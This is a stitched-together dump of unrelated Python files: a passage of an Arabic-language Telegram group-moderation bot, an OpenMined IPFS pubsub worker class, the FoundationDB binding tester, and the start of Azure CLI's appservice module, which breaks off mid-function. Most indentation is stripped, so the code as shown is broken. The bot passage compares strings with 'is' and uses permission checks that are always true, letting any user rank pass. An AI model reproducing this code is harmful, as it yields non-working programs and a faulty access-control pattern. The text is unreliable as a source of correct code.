if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True and re.search(c.startlock,text):
if Ckuser(message):
t = threading.Thread(target=locks,args=(client, message,redis))
t.daemon = True
t.start()
        if (rank is False or rank == 0) and group is True:
t = threading.Thread(target=delete,args=(client, message,redis))
t.daemon = True
t.start()
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True:
t = threading.Thread(target=gpcmd,args=(client, message,redis))
t.daemon = True
t.start()
if type is "private" and message.outgoing != True:
text = message.text
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos"):
t = threading.Thread(target=sudo,args=(client, message,redis))
t.daemon = True
t.start()
if text and re.search("^/start$",text):
userID = message.from_user.id
userFN = message.from_user.first_name
redis.sadd("{}Nbot:privates".format(BOT_ID),userID)
if rank == "sudo":
kb = ReplyKeyboardMarkup([[r.RKgp, r.RKgpl],[r.RKaf, r.RKrf],[r.RKf],["جلب نسخه احتياطيه"],[r.RKub]],resize_keyboard=True)
Bot("sendMessage",{"chat_id":chatID,"text":r.sudostart,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb})
return 0
getbot = client.get_me()
kb = InlineKeyboardMarkup([[InlineKeyboardButton("TshakeTeam", url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.botstart.format(getbot.first_name,getbot.username),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb})
if text and re.search("^/start (.*)$",text):
tx = text.replace("/start ","")
split = tx.split("=")
order = split[0]
if order == "showreplylistBOT":
chatId = split[1]
userId = split[2]
TY = split[3]
rank = isrank(redis,userId,chatId)
if (rank == "sudo" or rank is "asudo" or rank == "sudos"):
li = redis.hkeys("{}Nbot:{}".format(BOT_ID,TY))
if li:
i = 1
words = ""
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY+'BOT'),"",userID])),]])
Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if order == "showreplylist":
chatId = split[1]
userId = split[2]
TY = split[3]
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId)
rank = isrank(redis,userId,chatId)
if (rank is not False or rank is not 0 or rank != "vip" or rank != "admin") and group is True:
li = redis.hkeys("{}Nbot:{}:{}".format(BOT_ID,chatId,TY))
if li:
i = 1
words = ""
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY),chatId,userID])),]])
Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if order == "showBlocklist":
chatId = split[1]
userId = split[2]
TY = split[3]
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId)
rank = isrank(redis,userId,chatId)
if (rank is not False or rank is not 0 or rank != "vip") and group is True:
redis.hset("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),tx,text)
li = redis.smembers("{}Nbot:{}:{}".format(BOT_ID,chatId,TY))
if li:
i = 1
words = ""
for ID in li:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Blocklistone,callback_data=json.dumps(["delfromb",TY,userID,chatId])),]])
if TY == "blockanimations":
Bot("sendAnimation",{"chat_id":userId,"animation":ID,"reply_markup":reply_markup})
if TY == "blockSTICKERs":
Bot("sendSticker",{"chat_id":userId,"sticker":ID,"reply_markup":reply_markup})
if TY == "blockphotos":
Bot("sendPhoto",{"chat_id":userId,"photo":ID,"reply_markup":reply_markup})
if TY == "blockTEXTs":
words = words+"\n"+str(i)+" - {"+ID+"}"
i += 1
print(len(words))
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
if TY == "blockTEXTs":
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2,callback_data=json.dumps(["delBL",TY,userID,chatId])),]])
Bot("sendMessage",{"chat_id":userId,"text":r.Delall,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
else:
Bot("sendMessage",{"chat_id":userId,"text":r.listempty2,"reply_to_message_id":message.message_id,"parse_mode":"html"})
|
base_worker.py
|
import base64
import json
import random
import time
from threading import Thread
from bitcoin import base58
from ..lib import utils
from ..services.broadcast_known_workers import BroadcastKnownWorkersService
from ..services.whoami import WhoamiService
class GridWorker():
def __init__(self, node_type, email=None, name=None):
self.node_type = node_type
self.api = utils.get_ipfs_api(self.node_type)
self.id = utils.get_id(self.node_type, self.api)
# Maps IDs to objects we don't want to pass around, e.g. torch objects
self.objects = {}
# load email and name
whoami = utils.load_whoami()
if (email is None):
if whoami:
self.email = whoami['email']
else:
self.email = input('Enter your email for payment: ')
else:
self.email = email
if (name is None):
if (whoami):
self.name = whoami['name']
else:
self.name = input('Enter an easy name to remember you by: ')
else:
self.name = name
whoami = {'email': self.email, 'name': self.name}
utils.store_whoami(whoami)
self.subscribed = []
# LAUNCH SERVICES - these are non-blocking and run on their own threads
# all service objects will live in this dictionary
self.services = {}
if node_type != 'client':
# this service serves the purpose of helping other nodes find out
# about nodes on the network.
# if someone queries the "list_worker" channel - it'll send a
# message directly to the querying node with a list of the
# OpenMined nodes of which it is aware.
self.services[
'broadcast_known_workers'] = BroadcastKnownWorkersService(self)
# WHOMAI
self.services['whoami_service'] = WhoamiService(self)
def get_openmined_nodes(self):
"""
        This method returns the list of known openmined workers on the network.
Note - not all workers are necessarily "compute" workers.
Some may only be anchors and will ignore any jobs you send them.
"""
nodes = self.api.pubsub_peers('openmined')
if (nodes is not None):
return nodes
else:
return []
def get_nodes(self):
nodes = self.api.pubsub_peers()
if (nodes is not None):
return nodes
else:
return []
def publish(self, channel, message):
"""
This method sends a message over an IPFS channel. The number of people
who receive it is purely based on the number of people who happen
to be listening.
"""
if isinstance(message, dict) or isinstance(message, list):
self.api.pubsub_pub(topic=channel, payload=json.dumps(message))
else:
self.api.pubsub_pub(topic=channel, payload=message)
def request_response(self, channel, message, response_handler, timeout=10):
"""
This method makes a request over a channel to a specific node and
will hang until it receives a response from that node. Note that
the channel used for the response is random.
"""
random_channel = self.id + "_" + str(random.randint(0, 1e10))
def timeout_message(seconds):
time.sleep(int(seconds))
self.publish(
channel=random_channel,
message=["timeout after " + str(seconds) + " seconds"])
def send():
self.publish(channel=channel, message=[message, random_channel])
        t1 = Thread(target=timeout_message, args=(timeout,))
t1.start()
response = self.listen_to_channel_sync(random_channel,
response_handler, send)
if (len(response) == 1):
try:
if ('timeout' in response[0]):
raise TimeoutError(response[0])
except RuntimeError:
# response is 1d with length 1
pass
return response
def listen_to_channel_sync(self, *args):
"""
Synchronous version of listen_to_channel
"""
return self.listen_to_channel_impl(*args)
def listen_to_channel(self, *args):
"""
Listens for IPFS pubsub sub messages asynchronously.
This function will create the listener and call back your handler
function on a new thread.
"""
t1 = Thread(target=self.listen_to_channel_impl, args=args)
t1.start()
def listen_to_channel_impl(self,
channel,
handle_message,
init_function=None,
ignore_from_self=False):
"""
Do not call directly. Use listen_to_channel or listen_to_channel_sync instead.
"""
first_proc = True
if channel not in self.subscribed:
new_messages = self.api.pubsub_sub(topic=channel, stream=True)
self.subscribed.append(channel)
else:
return
        # new_messages is a generator which will keep yielding new messages until
# you return from the loop. If you do return from the loop, we will no
# longer be subscribed.
for m in new_messages:
if init_function is not None and first_proc:
init_function()
first_proc = False
message = self.decode_message(m)
if message is not None:
fr = base58.encode(message['from'])
if not ignore_from_self or fr != self.id:
out = handle_message(message)
if out is not None:
return out
else:
                    print('ignore message from self')
def decode_message(self, encoded):
if ('from' in encoded):
decoded = {}
decoded['from'] = base64.standard_b64decode(encoded['from'])
decoded['data'] = base64.standard_b64decode(
encoded['data']).decode('ascii')
decoded['seqno'] = base64.standard_b64decode(encoded['seqno'])
decoded['topicIDs'] = encoded['topicIDs']
decoded['encoded'] = encoded
return decoded
else:
return None
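# Editorial usage sketch (not part of the original worker); the channel names and
# the handler below are illustrative only.
def _example_pubsub_usage():
    worker = GridWorker('client')
    def handle(message):
        # Returning a non-None value stops the listener and becomes the reply.
        return json.loads(message['data'])
    # Non-blocking listener on a background thread; a handler that returns None
    # keeps the subscription alive.
    worker.listen_to_channel('openmined', print)
    # Blocking request that is answered on a randomly named reply channel.
    return worker.request_response('list_workers', 'hello', handle, timeout=10)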
|
tester.py
|
#!/usr/bin/python
#
# tester.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import ctypes
import math
import sys
import os
import struct
import threading
import time
import random
import time
import traceback
sys.path[:0] = [os.path.join(os.path.dirname(__file__), '..')]
import fdb
fdb.api_version(int(sys.argv[2]))
from fdb import six
from fdb.impl import strinc
import fdb.tuple
from directory_extension import DirectoryExtension
from cancellation_timeout_tests import test_timeouts
from cancellation_timeout_tests import test_db_timeouts
from cancellation_timeout_tests import test_cancellation
from cancellation_timeout_tests import test_retry_limits
from cancellation_timeout_tests import test_db_retry_limits
from cancellation_timeout_tests import test_combinations
from size_limit_tests import test_size_limit_option
random.seed(0)
if len(sys.argv) == 4:
db = fdb.open(sys.argv[3])
else:
db = fdb.open()
class Stack:
def __init__(self):
self.stack = []
def __repr__(self):
return repr(self.stack)
def __str__(self):
return str(self.stack)
def __len__(self):
return len(self.stack)
def __getitem__(self, idx):
return self.stack[idx]
def __setitem__(self, idx, val):
self.stack[idx] = val
def push(self, idx, val):
self.stack.insert(0, (idx, val))
def pop(self, count=None, with_idx=False):
c = count
if c is None:
c = 1
raw = self.stack[:c]
del self.stack[:c]
for i in range(len(raw)):
if isinstance(raw[i][1], fdb.Future):
try:
val = raw[i][1].wait()
if val is None or (hasattr(val, 'present') and not val.present()):
raw[i] = (raw[i][0], b'RESULT_NOT_PRESENT')
else:
raw[i] = (raw[i][0], val)
except fdb.FDBError as e:
# print('ERROR: %r' % e)
raw[i] = (raw[i][0], fdb.tuple.pack((b'ERROR', str(e.code).encode('ascii'))))
if count is None:
if with_idx:
return raw[0]
else:
return raw[0][1]
else:
if with_idx:
return raw
else:
return [item[1] for item in raw]
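# Editorial sketch (not exercised by the tester): Stack keeps
# (instruction_index, value) pairs with the newest entry at index 0, and pop()
# resolves any fdb.Future values before returning them.
def _stack_semantics_example():
    s = Stack()
    s.push(0, b'foo')
    s.push(1, b'bar')
    assert s.pop() == b'bar'
    assert s.pop(with_idx=True) == (0, b'foo')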
class Instruction:
def __init__(self, tr, stack, op, index, isDatabase=False, isSnapshot=False):
self.tr = tr
self.stack = stack
self.op = op
self.index = index
self.isDatabase = isDatabase
self.isSnapshot = isSnapshot
def pop(self, count=None, with_idx=False):
return self.stack.pop(count, with_idx)
def push(self, val):
self.stack.push(self.index, val)
def test_db_options(db):
db.options.set_max_watches(100001)
db.options.set_datacenter_id("dc_id")
db.options.set_machine_id("machine_id")
db.options.set_transaction_timeout(100000)
db.options.set_transaction_timeout(0)
db.options.set_transaction_timeout(0)
db.options.set_transaction_max_retry_delay(100)
db.options.set_transaction_size_limit(100000)
db.options.set_transaction_retry_limit(10)
db.options.set_transaction_retry_limit(-1)
db.options.set_snapshot_ryw_enable()
db.options.set_snapshot_ryw_disable()
@fdb.transactional
def test_options(tr):
tr.options.set_priority_system_immediate()
tr.options.set_priority_batch()
tr.options.set_causal_read_risky()
tr.options.set_causal_write_risky()
tr.options.set_read_your_writes_disable()
tr.options.set_read_system_keys()
tr.options.set_access_system_keys()
tr.options.set_timeout(60 * 1000)
tr.options.set_retry_limit(50)
tr.options.set_max_retry_delay(100)
tr.options.set_used_during_commit_protection_disable()
tr.options.set_debug_transaction_identifier('my_transaction')
tr.options.set_log_transaction()
tr.options.set_read_lock_aware()
tr.options.set_lock_aware()
tr.get(b'\xff').wait()
def check_watches(db, watches, expected):
for i, watch in enumerate(watches):
if watch.is_ready() or expected:
try:
watch.wait()
if not expected:
assert False, "Watch %d is ready" % i
except fdb.FDBError as e:
tr = db.create_transaction()
tr.on_error(e).wait()
return False
return True
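# Registers watches via watch/clear_and_watch/set_and_watch/get_and_watch,
# verifies none of them fire while the watched keys are unchanged, then mutates
# every key and expects all watches to become ready; the loop restarts if a
# watch fires spuriously.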
def test_watches(db):
while True:
db[b'w0'] = b'0'
db[b'w3'] = b'3'
watches = [None]
@fdb.transactional
def txn1(tr):
watches[0] = tr.watch(b'w0')
tr.set(b'w0', b'0')
assert not watches[0].is_ready()
txn1(db)
watches.append(db.clear_and_watch(b'w1'))
watches.append(db.set_and_watch(b'w2', b'2'))
watches.append(db.get_and_watch(b'w3'))
assert watches[3][0] == b'3'
watches[3] = watches[3][1]
time.sleep(1)
if not check_watches(db, watches, False):
continue
del db[b'w1']
time.sleep(5)
if not check_watches(db, watches, False):
continue
db[b'w0'] = b'a'
db[b'w1'] = b'b'
del db[b'w2']
db.bit_xor(b'w3', b'\xff\xff')
if check_watches(db, watches, True):
return
@fdb.transactional
def test_locality(tr):
tr.options.set_timeout(60 * 1000)
tr.options.set_read_system_keys() # We do this because the last shard (for now, someday the last N shards) is in the /FF/ keyspace
# This isn't strictly transactional, though we expect it to be given the size of our database
boundary_keys = list(fdb.locality.get_boundary_keys(tr, b'', b'\xff\xff')) + [b'\xff\xff']
end_keys = [tr.get_key(fdb.KeySelector.last_less_than(k)) for k in boundary_keys[1:]]
start_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in boundary_keys[:-1]]
end_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in end_keys]
if [set(s.wait()) for s in start_addresses] != [set(e.wait()) for e in end_addresses]:
raise Exception("Locality not internally consistent.")
def test_predicates():
assert fdb.predicates.is_retryable(fdb.FDBError(1020))
assert not fdb.predicates.is_retryable(fdb.FDBError(10))
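# Stack-machine interpreter for the cross-binding tester: it reads packed
# instructions from the key range identified by `prefix`, executes each opcode
# against the shared stack, and shares transactions between threads through the
# class-level tr_map keyed by transaction name.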
class Tester:
tr_map = {}
tr_map_lock = threading.RLock()
def __init__(self, db, prefix):
self.db = db
self.instructions = self.db[fdb.tuple.range((prefix,))]
self.stack = Stack()
self.tr_name = prefix
Tester.tr_map[self.tr_name] = None
self.last_version = 0
self.threads = []
self.directory_extension = DirectoryExtension()
def push_range(self, inst, iter, prefix_filter=None):
kvs = []
for k, v in iter:
if prefix_filter is None or k.startswith(prefix_filter):
kvs += [k, v]
inst.push(fdb.tuple.pack(tuple(kvs)))
@staticmethod
@fdb.transactional
def wait_empty(tr, prefix):
res = tr.get_range_startswith(prefix, 1).to_list()
if len(res) == 1:
raise fdb.FDBError(1020)
@fdb.transactional
def log_stack(self, tr, prefix, entries):
for i, (idx, el) in entries.items():
pk = prefix + fdb.tuple.pack((i, idx))
pv = fdb.tuple.pack((el,))
tr.set(pk, pv[:40000])
def current_transaction(self):
with Tester.tr_map_lock:
return Tester.tr_map[self.tr_name]
def new_transaction(self):
with Tester.tr_map_lock:
Tester.tr_map[self.tr_name] = self.db.create_transaction()
def switch_transaction(self, name):
self.tr_name = name
with Tester.tr_map_lock:
if self.tr_name not in Tester.tr_map:
self.new_transaction()
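# Main instruction loop: decodes each op, strips the _DATABASE/_SNAPSHOT suffix
# to pick the target object, and pushes any FDBError as a packed
# (b'ERROR', code) tuple instead of raising.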
def run(self):
for idx, i in enumerate(self.instructions):
op_tuple = fdb.tuple.unpack(i.value)
op = op_tuple[0]
# print("Stack is %r" % self.stack)
# if op != "PUSH" and op != "SWAP":
# print("%d. Instruction is %s" % (idx, op))
isDatabase = op.endswith(six.u('_DATABASE'))
isSnapshot = op.endswith(six.u('_SNAPSHOT'))
if isDatabase:
op = op[:-9]
obj = self.db
elif isSnapshot:
op = op[:-9]
obj = self.current_transaction().snapshot
else:
obj = self.current_transaction()
inst = Instruction(obj, self.stack, op, idx, isDatabase, isSnapshot)
try:
if inst.op == six.u("PUSH"):
inst.push(op_tuple[1])
elif inst.op == six.u("DUP"):
inst.stack.push(*self.stack[0])
elif inst.op == six.u("EMPTY_STACK"):
self.stack = Stack()
elif inst.op == six.u("SWAP"):
idx = inst.pop()
self.stack[0], self.stack[idx] = self.stack[idx], self.stack[0]
elif inst.op == six.u("POP"):
inst.pop()
elif inst.op == six.u("SUB"):
a, b = inst.pop(2)
inst.push(a - b)
elif inst.op == six.u("CONCAT"):
a, b = inst.pop(2)
inst.push(a + b)
elif inst.op == six.u("WAIT_FUTURE"):
old_idx, item = inst.pop(with_idx=True)
inst.stack.push(old_idx, item)
elif inst.op == six.u("NEW_TRANSACTION"):
self.new_transaction()
elif inst.op == six.u("USE_TRANSACTION"):
self.switch_transaction(inst.pop())
elif inst.op == six.u("ON_ERROR"):
inst.push(inst.tr.on_error(inst.pop()))
elif inst.op == six.u("GET"):
key = inst.pop()
num = random.randint(0, 2)
if num == 0:
f = obj[key]
elif num == 1:
f = obj.get(key)
else:
f = obj.__getitem__(key)
if f == None:
inst.push(b'RESULT_NOT_PRESENT')
else:
inst.push(f)
elif inst.op == six.u("GET_KEY"):
key, or_equal, offset, prefix = inst.pop(4)
result = obj.get_key(fdb.KeySelector(key, or_equal, offset))
if result.startswith(prefix):
inst.push(result)
elif result < prefix:
inst.push(prefix)
else:
inst.push(strinc(prefix))
elif inst.op == six.u("GET_RANGE"):
begin, end, limit, reverse, mode = inst.pop(5)
if limit == 0 and mode == -1 and random.random() < 0.5:
if reverse:
r = obj[begin:end:-1]
else:
r = obj[begin:end]
else:
r = obj.get_range(begin, end, limit, reverse, mode)
self.push_range(inst, r)
elif inst.op == six.u("GET_RANGE_STARTS_WITH"):
prefix, limit, reverse, mode = inst.pop(4)
self.push_range(inst, obj.get_range_startswith(prefix, limit, reverse, mode))
elif inst.op == six.u("GET_RANGE_SELECTOR"):
begin_key, begin_or_equal, begin_offset, end_key, end_or_equal, end_offset, limit, reverse, mode, prefix = inst.pop(10)
beginSel = fdb.KeySelector(begin_key, begin_or_equal, begin_offset)
endSel = fdb.KeySelector(end_key, end_or_equal, end_offset)
if limit == 0 and mode == -1 and random.random() < 0.5:
if reverse:
r = obj[beginSel:endSel:-1]
else:
r = obj[beginSel:endSel]
else:
r = obj.get_range(beginSel, endSel, limit, reverse, mode)
self.push_range(inst, r, prefix_filter=prefix)
elif inst.op == six.u("GET_READ_VERSION"):
self.last_version = obj.get_read_version().wait()
inst.push(b"GOT_READ_VERSION")
elif inst.op == six.u("SET"):
key, value = inst.pop(2)
if random.random() < 0.5:
obj[key] = value
else:
obj.set(key, value)
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("LOG_STACK"):
prefix = inst.pop()
entries = {}
while len(self.stack) > 0:
stack_index = len(self.stack) - 1
entries[stack_index] = inst.pop(with_idx=True)
if len(entries) == 100:
self.log_stack(self.db, prefix, entries)
entries = {}
self.log_stack(self.db, prefix, entries)
elif inst.op == six.u("ATOMIC_OP"):
opType, key, value = inst.pop(3)
getattr(obj, opType.lower())(key, value)
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("SET_READ_VERSION"):
inst.tr.set_read_version(self.last_version)
elif inst.op == six.u("CLEAR"):
if random.random() < 0.5:
del obj[inst.pop()]
else:
obj.clear(inst.pop())
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("CLEAR_RANGE"):
begin, end = inst.pop(2)
num = random.randint(0, 2)
if num == 0:
del obj[begin:end]
elif num == 1:
obj.clear_range(begin, end)
else:
obj.__delitem__(slice(begin, end))
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("CLEAR_RANGE_STARTS_WITH"):
obj.clear_range_startswith(inst.pop())
if obj == self.db:
inst.push(b"RESULT_NOT_PRESENT")
elif inst.op == six.u("READ_CONFLICT_RANGE"):
inst.tr.add_read_conflict_range(inst.pop(), inst.pop())
inst.push(b"SET_CONFLICT_RANGE")
elif inst.op == six.u("WRITE_CONFLICT_RANGE"):
inst.tr.add_write_conflict_range(inst.pop(), inst.pop())
inst.push(b"SET_CONFLICT_RANGE")
elif inst.op == six.u("READ_CONFLICT_KEY"):
inst.tr.add_read_conflict_key(inst.pop())
inst.push(b"SET_CONFLICT_KEY")
elif inst.op == six.u("WRITE_CONFLICT_KEY"):
inst.tr.add_write_conflict_key(inst.pop())
inst.push(b"SET_CONFLICT_KEY")
elif inst.op == six.u("DISABLE_WRITE_CONFLICT"):
inst.tr.options.set_next_write_no_write_conflict_range()
elif inst.op == six.u("COMMIT"):
inst.push(inst.tr.commit())
elif inst.op == six.u("RESET"):
inst.tr.reset()
elif inst.op == six.u("CANCEL"):
inst.tr.cancel()
elif inst.op == six.u("GET_COMMITTED_VERSION"):
self.last_version = inst.tr.get_committed_version()
inst.push(b"GOT_COMMITTED_VERSION")
elif inst.op == six.u("GET_VERSIONSTAMP"):
inst.push(inst.tr.get_versionstamp())
elif inst.op == six.u("TUPLE_PACK"):
count = inst.pop()
items = inst.pop(count)
inst.push(fdb.tuple.pack(tuple(items)))
elif inst.op == six.u("TUPLE_PACK_WITH_VERSIONSTAMP"):
prefix = inst.pop()
count = inst.pop()
items = inst.pop(count)
if not fdb.tuple.has_incomplete_versionstamp(items) and random.random() < 0.5:
inst.push(b"ERROR: NONE")
else:
try:
packed = fdb.tuple.pack_with_versionstamp(tuple(items), prefix=prefix)
inst.push(b"OK")
inst.push(packed)
except ValueError as e:
if str(e).startswith("No incomplete"):
inst.push(b"ERROR: NONE")
else:
inst.push(b"ERROR: MULTIPLE")
elif inst.op == six.u("TUPLE_UNPACK"):
for i in fdb.tuple.unpack(inst.pop()):
inst.push(fdb.tuple.pack((i,)))
elif inst.op == six.u("TUPLE_SORT"):
count = inst.pop()
items = inst.pop(count)
unpacked = map(fdb.tuple.unpack, items)
if six.PY3:
sorted_items = sorted(unpacked, key=fdb.tuple.pack)
else:
sorted_items = sorted(unpacked, cmp=fdb.tuple.compare)
for item in sorted_items:
inst.push(fdb.tuple.pack(item))
elif inst.op == six.u("TUPLE_RANGE"):
count = inst.pop()
items = inst.pop(count)
r = fdb.tuple.range(tuple(items))
inst.push(r.start)
inst.push(r.stop)
elif inst.op == six.u("ENCODE_FLOAT"):
f_bytes = inst.pop()
f = struct.unpack(">f", f_bytes)[0]
if not math.isnan(f) and not math.isinf(f) and not f == -0.0 and f == int(f):
f = int(f)
inst.push(fdb.tuple.SingleFloat(f))
elif inst.op == six.u("ENCODE_DOUBLE"):
d_bytes = inst.pop()
d = struct.unpack(">d", d_bytes)[0]
inst.push(d)
elif inst.op == six.u("DECODE_FLOAT"):
f = inst.pop()
f_bytes = struct.pack(">f", f.value)
inst.push(f_bytes)
elif inst.op == six.u("DECODE_DOUBLE"):
d = inst.pop()
d_bytes = struct.pack(">d", d)
inst.push(d_bytes)
elif inst.op == six.u("START_THREAD"):
t = Tester(self.db, inst.pop())
thr = threading.Thread(target=t.run)
thr.start()
self.threads.append(thr)
elif inst.op == six.u("WAIT_EMPTY"):
prefix = inst.pop()
Tester.wait_empty(self.db, prefix)
inst.push(b"WAITED_FOR_EMPTY")
elif inst.op == six.u("UNIT_TESTS"):
try:
db.options.set_location_cache_size(100001)
test_db_options(db)
test_options(db)
test_watches(db)
test_cancellation(db)
test_retry_limits(db)
test_db_retry_limits(db)
test_timeouts(db)
test_db_timeouts(db)
test_combinations(db)
test_locality(db)
test_predicates()
test_size_limit_option(db)
except fdb.FDBError as e:
print("Unit tests failed: %s" % e.description)
traceback.print_exc()
raise Exception("Unit tests failed: %s" % e.description)
elif inst.op.startswith(six.u('DIRECTORY_')):
self.directory_extension.process_instruction(inst)
else:
raise Exception("Unknown op %s" % inst.op)
except fdb.FDBError as e:
# print('ERROR: %r' % e)
inst.stack.push(idx, fdb.tuple.pack((b"ERROR", str(e.code).encode('ascii'))))
# print(" to %s" % self.stack)
# print()
[thr.join() for thr in self.threads]
if __name__ == '__main__':
t = Tester(db, sys.argv[1].encode('ascii'))
t.run()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from azure.cli.core.profiles import ResourceType
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION, FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION,
FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
